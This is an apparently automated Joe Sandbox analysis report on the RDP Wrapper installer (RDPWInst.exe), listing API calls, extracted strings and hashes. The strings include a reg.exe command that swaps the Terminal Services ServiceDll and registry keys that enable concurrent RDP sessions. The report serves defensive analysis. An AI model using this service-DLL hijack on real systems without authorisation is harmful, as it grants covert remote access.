                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: - By using all or any portion of this software, you are agreeing$ - If you do not agree to any terms of the license agreement,$ - To read the license agreement, run the installer with -l parameter.$ do not use the software.$ only >= 6.0 (Vista, Server 2008 and newer) are supported.$ to be bound by all the terms and conditions of the license agreement.$$sD$%ProgramFiles%\RDP Wrapper\rdpwrap.dll$%SystemRoot%\system32\rdpwrap.dll$-i install wrapper to Program Files folder (default)$-i -o online install mode (loads latest INI file)$-i -s install wrapper to System32 folder$-l display the license agreement$-r force restart Terminal Services$-u uninstall wrapper$-u -k uninstall wrapper and keep settings$-w get latest update for INI file$Copyright (C) Stas'M Corp. 2017$Installer v2.5$LpD$RDP Wrapper Library v1.6.2$RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r]$SeDebugPrivilege$TermService$USAGE:$[*] Checking dependencies...$[*] Checking for updates...$[*] Configuring firewall...$[*] Configuring registry...$[*] Configuring service library...$[*] Extracting files...$[*] Installing...$[*] Notice to user:$[*] RDP Wrapper Library is already installed.$[*] RDP Wrapper Library is not installed.$[*] Removing files...$[*] Resetting service library...$[*] Restarting...$[*] Terminating service...$[*] Uninstalling...$[+] Done.$[+] Successfully installed.$[+] Successfully uninstalled.$[-] Unsupported Windows version:$[-] Unsupported processor architecture.$license
                                                    • API String ID: 0-551293883
                                                    • Opcode ID: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                    • Instruction ID: 3b3904e08207714e519852b142ec2c0d1fdd34891fa1322cb905310c24a2fa21
                                                    • Opcode Fuzzy Hash: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                    • Instruction Fuzzy Hash: D60208A4B091404BEB00BBFB894324EA5519FC574CF92817FB604B72D7CA3CA8156A7F

                                                    Control-flow Graph

                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE85
                                                    • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE90
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AED6
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE2
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastOpenService$CloseHandleManager
                                                    • String ID: $sD$...$ServicesActive$[*] Checking $[-] OpenSCManager error (code $[-] OpenService error (code $[-] QueryServiceConfig error (code $[-] QueryServiceConfig failed.
                                                    • API String ID: 48634454-3812534468
                                                    • Opcode ID: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                    • Instruction ID: 7a774fc46d996de6837286bf894840c9c95f128f26b1d3a09438fbe6509dfab0
                                                    • Opcode Fuzzy Hash: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                    • Instruction Fuzzy Hash: 41418FA4A08200AAD711F7B68C42A5F76A99F88308F11917BB514B6293CB3CAD01967F

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00447324), ref: 0043E8BE
                                                    • GetLastError.KERNEL32(?,?,00447324), ref: 0043E978
                                                    • GetLastError.KERNEL32(?,?,00447324), ref: 0043EA23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: $sD$AllowMultipleTSSessions$EnableConcurrentSessions$Name$RDPClip$RDPDND$Type$[-] OpenKey error (code $\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$\SYSTEM\CurrentControlSet\Control\Terminal Server$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Clip Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\DND Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC$\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core$fDenyTSConnections
                                                    • API String ID: 1452528299-1114397459
                                                    • Opcode ID: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                    • Instruction ID: d5bff1feb4e6776106dd90f858afd21f9f4463beb35b4115f94bb768dd44f540
                                                    • Opcode Fuzzy Hash: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                    • Instruction Fuzzy Hash: 97A16E70B052005BEB10BBBB984256E76A5DB8D308F51A47FF400A76D2CB3DAC05972E

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,00409151,?,00000000), ref: 00408FA5
                                                    • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FC1
                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FEE
                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151), ref: 0040900C
                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 0040902A
                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00409048
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000), ref: 00409088
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090B3
                                                    • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090D7
                                                    • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,?,?,?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00409100
                                                    • RegCloseKey.ADVAPI32(?,0040913B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales), ref: 0040912E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                    • API String ID: 3482678030-345420546
                                                    • Opcode ID: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                    • Instruction ID: 299ddb9754ebd29522f96ae12af661ce277d6f97d31c05324fadffe1222b4d16
                                                    • Opcode Fuzzy Hash: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                    • Instruction Fuzzy Hash: CA510071B40209BEEB10EAA5CD46FAE77BCEB48704F504477B604F61C2D6B8AE408A5D

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A827
                                                    • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A91D
                                                      • Part of subcall function 00438860: RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                      • Part of subcall function 00438860: RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$CloseFlush
                                                    • String ID: $sD$ImagePath$ServiceDll$[*] ImagePath: "$[*] ServiceDll: "$[-] Another third-party TermService library is installed.$[-] OpenKeyReadOnly error (code $[-] TermService is hosted in a custom application (BeTwin, etc.) - unsupported.$\SYSTEM\CurrentControlSet\Services\TermService$\SYSTEM\CurrentControlSet\Services\TermService\Parameters$rdpwrap.dll$svchost -k$svchost.exe$termsrv.dll
                                                    • API String ID: 1149308822-2563127478
                                                    • Opcode ID: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                    • Instruction ID: 1ac512ede3db6dba28468dccd327cdb8adfd53dd4df03d49c6afb8088628474e
                                                    • Opcode Fuzzy Hash: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                    • Instruction Fuzzy Hash: 01515774B442005BD700FBBA8D4255EB2659F8930CB51A43FB840BB796CB3CEC158AAF

                                                    Control-flow Graph

                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000,004095BB), ref: 00408C46
                                                    • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C6A
                                                    • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C79
                                                    • IsValidLocale.KERNEL32(00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000), ref: 00408C8D
                                                    • EnterCriticalSection.KERNEL32(00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?), ref: 00408CEA
                                                    • lstrcpynW.KERNEL32(en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540), ref: 00408D08
                                                    • LeaveCriticalSection.KERNEL32(00449B54,en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000), ref: 00408D12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$Enter$LocaleValidlstrcpyn
                                                    • String ID: en-GB,en,en-US,
                                                    • API String ID: 1058953229-3021119265
                                                    • Opcode ID: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                    • Instruction ID: 9b1ce77b3c0781b783b438d4c88a1dd796634ce3a4aca31124bb85a30b48e6d3
                                                    • Opcode Fuzzy Hash: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                    • Instruction Fuzzy Hash: B321AE203042556AEB50B77A9E57B6A2169EF4570CF60443FB481B72D2CEBCAC04E22E

                                                    Control-flow Graph

                                                    APIs
                                                    • OpenProcess.KERNEL32(00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                    • GetLastError.KERNEL32(00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                    • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseErrorHandleLastProcess$OpenTerminate
                                                    • String ID: $sD$[-] OpenProcess error (code $[-] TerminateProcess error (code
                                                    • API String ID: 1809907545-775158141
                                                    • Opcode ID: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                    • Instruction ID: c032a40b630c9990863936c46c82d74717666648ea03c3b6a4bb658b84b7f9ba
                                                    • Opcode Fuzzy Hash: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                    • Instruction Fuzzy Hash: EB01F6A5B442111AE610B3FB0D82B2F255A8F8A75CF02917FB504B62D7CA3C9C11977F

                                                    Control-flow Graph (rendered graph omitted): 38 basic blocks spanning 0040472C to 004048D6; the executed/not-executed colouring is not recoverable as text. Blocks containing API calls: CreateFileW (004047A5), GetFileSize (004047D1), SetFilePointer (004047EE and 00404836), ReadFile (00404801), SetEndOfFile (0040484B), GetStdHandle (00404888), GetFileType (0040489C), CloseHandle (004048B7), GetLastError (004048CB, the shared error exit).
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047B5
                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047D9
                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047F5
                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00404816
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040483F
                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0040484D
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404888
                                                    • GetFileType.KERNEL32(?,000000F5), ref: 0040489E
                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 004048B9
                                                    • GetLastError.KERNEL32(000000F5), ref: 004048D1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                    • String ID:
                                                    • API String ID: 1694776339-0
                                                    • Opcode ID: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                    • Instruction ID: de0dc4671a2c55deed7a27a48df34c8c3110be8be3acd5b577aa359944728292
                                                    • Opcode Fuzzy Hash: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                    • Instruction Fuzzy Hash: EA4183B5500A40A9E730BF24C90972376E4EBC0714F20CE3FE692B66D0E7BDA845878D

                                                    APIs
                                                    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C37B
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C384
                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C3BB
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3C6
                                                    • CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandle$CreateErrorLastObjectProcessSingleWait
                                                    • String ID: $sD$D$[-] CreateProcess error (code:
                                                    • API String ID: 1377960556-1026335874
                                                    • Opcode ID: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                    • Instruction ID: 1d017b2d671d3512e5dabab7732e068b99e5a835ee42228d460eb482b244bc14
                                                    • Opcode Fuzzy Hash: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                    • Instruction Fuzzy Hash: D21151B0644204AADB00F7E5CD82F9E77B89F49714F61453BF610F61D2D67CA910972E
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,?,00000000,00402C9A), ref: 004030BE
                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402C9A), ref: 004030D8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                    • Instruction ID: 8e11df8688fcfc32dba15f0401baaa5f3e1cf13b6ab2085a37f93781684c6a2f
                                                    • Opcode Fuzzy Hash: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                    • Instruction Fuzzy Hash: 9F7115312052009FD715CF69CE89726BFE4AB89315F14827FD444AB3D6D7B889458789
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,0043C716,?,?,?,00447324,00000000,00000000,00000000,?,00443BC6,00000000,00443FB2), ref: 0043C600
                                                    Strings
                                                    • $sD, xrefs: 0043C60D
                                                    • %SystemRoot%, xrefs: 0043C682
                                                    • ServiceDll, xrefs: 0043C650
                                                    • " /f, xrefs: 0043C69A
                                                    • [-] OpenKey error (code , xrefs: 0043C612
                                                    • \system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d ", xrefs: 0043C68F
                                                    • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C5EF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: " /f$$sD$%SystemRoot%$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters$\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "
                                                    • API String ID: 1452528299-2956723230
                                                    • Opcode ID: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                    • Instruction ID: 86ae2d0f633f2b7d457566c29c3046f730a81976c8e7ce91198a0ccb689aa4bb
